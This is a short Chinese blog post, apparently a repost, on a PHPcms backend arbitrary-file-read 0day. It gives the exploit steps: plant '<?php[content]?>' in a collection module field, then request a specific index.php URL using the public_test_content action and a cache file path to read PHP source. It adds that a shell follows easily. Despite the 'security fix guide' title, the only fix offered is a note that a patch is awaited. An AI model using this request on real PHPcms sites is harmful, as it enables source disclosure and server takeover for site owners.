后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁
PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
未经允许不得转载:搬瓦工中文网 » PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
相关推荐
- 如何使用Linux命令行彻底格式化磁盘:完整指南与实操步骤
- CentOS系统使用mount命令详解:轻松挂载Windows 7共享文件夹教程
- 如何在Ubuntu Linux系统上轻松安装Dropbox:详细步骤指南
- Ubuntu 21.04 录屏工具失灵解决攻略:详解Ubuntu录屏工具使用技巧
- 如何在虚拟机中为CentOS 6.5设置IP地址:三种实用方法详解
- 如何在VMWare中快速配置CentOS的ifcfg-eth0文件(附亲测有效步骤)
- Linux磁盘空间转移详细教程:高效扩展存储容量避免数据丢失
- Linux中date命令日期转换错误 date: illegal time format 问题详细解决方案
- 如何在Ubuntu 21.04上顺利播放RMVB文件?解决Ubuntu播放RMVB视频难题的实用技巧
- CentOS 7本地YUM源配置详解:一步步教你搭建高效软件仓库
搬瓦工中文网






